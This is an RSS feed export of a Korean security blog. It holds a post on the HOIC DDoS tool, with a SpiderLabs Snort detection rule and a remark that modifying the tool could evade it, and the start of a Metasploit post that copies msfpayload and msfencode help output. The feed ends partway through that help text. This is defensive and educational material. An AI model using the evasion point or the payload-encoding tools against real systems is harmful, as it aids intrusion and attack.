<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
	<channel>
		<title>malwareL4B</title>
		<link>http://malwarelab.tistory.com/</link>
		<description>malwareL4B</description>
		<language>ko</language>
		<pubDate>Wed, 25 Apr 2012 16:45:10 +0900</pubDate>
		<generator>Tistory 1.1 (http://www.tistory.com/)</generator>
		<managingEditor>demantos</managingEditor>
		<image>
			<title>malwareL4B</title>
			<url>http://cfile29.uf.tistory.com/image/154F2E4F4D8C252E193F4E</url>
			<link>http://malwarelab.tistory.com</link>
			<description>malwareL4B</description>
		</image>
		<item>
			<title>블로그 옮깁니다~</title>
			<link>http://malwarelab.tistory.com/entry/%EB%B8%94%EB%A1%9C%EA%B7%B8-%EC%98%AE%EA%B9%81%EB%8B%88%EB%8B%A4</link>
			<description>&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: Georgia; &quot;&gt;블로그를 blogspot으로&lt;/span&gt;&lt;span style=&quot;font-family: Georgia; &quot;&gt;&amp;nbsp;옮깁니다~&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: Georgia; font-size: 18pt; &quot;&gt;&lt;a href=&quot;http://malwarel4b.blogspot.com/&quot; target=&quot;_blank&quot; class=&quot;tx-link&quot;&gt;&lt;span style=&quot;font-family: Georgia; &quot;&gt;http://malwarel4b.blogspot.com/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;~.~&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-155-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-155-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-155-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/155&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category></category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/155</guid>
			<comments>http://malwarelab.tistory.com/entry/%EB%B8%94%EB%A1%9C%EA%B7%B8-%EC%98%AE%EA%B9%81%EB%8B%88%EB%8B%A4#entry155comment</comments>
			<pubDate>Wed, 25 Apr 2012 16:44:17 +0900</pubDate>
		</item>
		<item>
			<title>HOIC DDoS Analysis and Detection</title>
			<link>http://malwarelab.tistory.com/entry/HOIC-DDoS-Analysis-and-Detection</link>
			<description>&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;얼마전 LOIC(Low Orbit Ion Cannon)의 JS 버전에 대한 이슈가 있었는데요..&lt;br /&gt;
&lt;br /&gt;&lt;a href=&quot;http://blog.spiderlabs.com/2011/01/loic-ddos-analysis-and-detection.html&quot; style=&quot;font-family: '맑은 고딕'; &quot;&gt;http://blog.spiderlabs.com/2011/01/loic-ddos-analysis-and-detection.html&lt;br /&gt;
&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;이번엔 HOIC(High Orbit Ion Cannon) 툴에 대한 이슈가 나왔습니다.&lt;br /&gt;
&lt;br /&gt;&lt;a href=&quot;http://blog.spiderlabs.com/2012/01/hoic-ddos-analysis-and-detection.html&quot;&gt;http://blog.spiderlabs.com/2012/01/hoic-ddos-analysis-and-detection.html&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;/a&gt;툴을 유포하던 사이트는 닫혔지만 툴은 인터넷을 통해 유포되고 있는듯 합니다.&lt;br /&gt;
&lt;br /&gt;&lt;p style=&quot;margin:0&quot;&gt;&lt;br /&gt;
&lt;/p&gt;&lt;p style=&quot;margin:0&quot;&gt;&lt;div class=&quot;imageblock&quot; style=&quot;display:inline;&quot;&gt;&lt;a href=&quot;http://cfile8.uf.tistory.com/original/1834E9434F28A87403FF4C&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile8.uf.tistory.com/image/1834E9434F28A87403FF4C&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;hoic_01.png&quot; height=&quot;322&quot; width=&quot;710&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/p&gt;
&lt;br /&gt;&lt;br /&gt;
요런 파일들을 가지고 있습니다.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;LOIC와의 차이점은 Boost 기능이 있다는 것인데요 *.hoic 파일이 Boot에 사용되는 파일입니다.&lt;br /&gt;
&lt;br /&gt;그런데 LOIC 공격과 그닥 큰 차이는 보이지 않는듯 합니다. -_-;;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
spiderlab의 분석글에서는 snort 탐지패턴을 언급을 하고 있는데 오탐 가능성도 많을 것으로 예상되며 &lt;br /&gt;
&lt;br /&gt;만약 소스코드가 공개된다면 spiderlab에서 제공한 패턴만으로는 탐지가 되지 않을 가능성이 큽니다.&lt;br /&gt;
&lt;br /&gt;spiderlab에서 이야기한 패턴 중에 헤더와 헤더값 사이에 공백이 두개가 있어서 이걸 탐지하는 것을 언급하고 있는데&lt;br /&gt;
&lt;br /&gt;소스코드 수정하면 충분이 해당 패턴을 충분히 우회가 가능할 것으로 보입니다.&lt;br /&gt;
&lt;br /&gt;&lt;p style=&quot;margin:0&quot;&gt;&lt;div class=&quot;imageblock&quot; style=&quot;display:inline;&quot;&gt;&lt;a href=&quot;http://cfile2.uf.tistory.com/original/137EEB3A4F28A9EB1583EF&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile2.uf.tistory.com/image/137EEB3A4F28A9EB1583EF&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;hoic_03.png&quot; height=&quot;598&quot; width=&quot;606&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/p&gt;
&lt;br /&gt;&lt;br /&gt;
탐지패턴은 바이너리로 |3a 20 20 | 를 탐지하는 형태였습니다.&lt;br /&gt;
&lt;br /&gt;&lt;table width=&quot;700&quot; bgcolor=&quot;#ffffff&quot; style=&quot;border-collapse:collapse&quot; cellpadding=&quot;1&quot; cellspacing=&quot;1&quot;&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td style=&quot;border:1px solid #dadada&quot; width=&quot;100%&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Courier New'; &quot;&gt;alert tcp $EXTERNAL_NET any -&amp;gt; $HOME_NET $HTTP_PORTS (msg:&quot;SLR Alert - HOIC Generic Detection with booster - HTTP 1.0 / Header Double Spacing&quot;; flow:established,to_server; &lt;font color=&quot;#e31600&quot;&gt;content:&quot;User-Agent|3a 20 20|&quot;;&lt;/font&gt; nocase; content:&quot;HTTP/1|2e|0&quot;; nocase; reference:url,blog.spiderlabs.com; threshold: type both, track by_src, count 15, seconds 30; classtype: slr-tw; sid:1; rev:1; )&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;
&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;&lt;br /&gt;
소스코드가 공개되지 않는 상태에서 해당 툴의 수정없이 공격한다면 위와 같은 패턴으로 탐지는 가능할 것으로 보입니다.&lt;br /&gt;
&lt;br /&gt;자세한건 상단에 있는 링크를 참조하시기 바랍니다.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-153-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-153-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-153-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/153&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x04 reference&amp;tools</category>
			<category>High Orbit Ion Cannon</category>
			<category>HOIC</category>
			<category>LOIC</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/153</guid>
			<comments>http://malwarelab.tistory.com/entry/HOIC-DDoS-Analysis-and-Detection#entry153comment</comments>
			<pubDate>Wed, 01 Feb 2012 12:02:49 +0900</pubDate>
		</item>
		<item>
			<title>Metasploit Generating Payloads</title>
			<link>http://malwarelab.tistory.com/entry/Metasploit-Generating-Payloads</link>
			<description>&lt;br /&gt;
&lt;br /&gt;&lt;A title=&quot;[http://www.offensive-security.com/metasploit-unleashed/Metasploit_Generating_Payloads]로 이동합니다.&quot; href=&quot;http://www.offensive-security.com/metasploit-unleashed/Metasploit_Generating_Payloads&quot; target=_blank&gt;http://www.offensive-security.com/metasploit-unleashed/Metasploit_Generating_Payloads&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&amp;nbsp; 
&lt;TABLE style=&quot;BORDER-COLLAPSE: collapse&quot; cellSpacing=1 cellPadding=1 width=700 bgColor=#ffffff&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD style=&quot;BORDER-BOTTOM: #dadada 1px solid; BORDER-LEFT: #dadada 1px solid; BORDER-TOP: #dadada 1px solid; BORDER-RIGHT: #dadada 1px solid&quot; width=&quot;100%&quot;&gt;
&lt;P&gt;&lt;A href=&quot;mailto:root@LUCKYSTRIKE&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;root@LUCKYSTRIKE&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;:~# msfpayload -h&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Usage: /usr/metasploit/msf3/msfpayload [&amp;lt;options&amp;gt;] &amp;lt;payload&amp;gt; [var=val] &amp;lt;[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar&amp;gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;OPTIONS:&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Help banner&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -l&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; List available payloads&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;TABLE style=&quot;BORDER-COLLAPSE: collapse&quot; cellSpacing=1 cellPadding=1 width=700 bgColor=#ffffff&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD style=&quot;BORDER-BOTTOM: #dadada 1px solid; BORDER-LEFT: #dadada 1px solid; BORDER-TOP: #dadada 1px solid; BORDER-RIGHT: #dadada 1px solid&quot; width=&quot;100%&quot;&gt;
&lt;P&gt;&lt;A href=&quot;mailto:root@LUCKYSTRIKE&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;root@LUCKYSTRIKE&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;:~# msfencode -h&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Usage: /usr/metasploit/msf3/msfencode &amp;lt;options&amp;gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;OPTIONS:&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -a &amp;lt;opt&amp;gt;&amp;nbsp; The architecture to encode as&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -b &amp;lt;opt&amp;gt;&amp;nbsp; The list of characters to avoid: '\x00\xff'&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -c &amp;lt;opt&amp;gt;&amp;nbsp; The number of times to encode the data&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -d &amp;lt;opt&amp;gt;&amp;nbsp; Specify the directory in which to look for EXE templates&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -e &amp;lt;opt&amp;gt;&amp;nbsp; The encoder to use&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Help banner&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -i &amp;lt;opt&amp;gt;&amp;nbsp; Encode the contents of the supplied file path&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -k&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Keep template working; run payload in new thread (use with -x)&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -l&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; List available encoders&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -m &amp;lt;opt&amp;gt;&amp;nbsp; Specifies an additional module search path&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -n&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Dump encoder information&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -o &amp;lt;opt&amp;gt;&amp;nbsp; The output file&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -p &amp;lt;opt&amp;gt;&amp;nbsp; The platform to encode for&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -s &amp;lt;opt&amp;gt;&amp;nbsp; The maximum size of the encoded data&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -t &amp;lt;opt&amp;gt;&amp;nbsp; The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -v&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Increase verbosity&lt;/SPAN&gt;&lt;br /&gt;
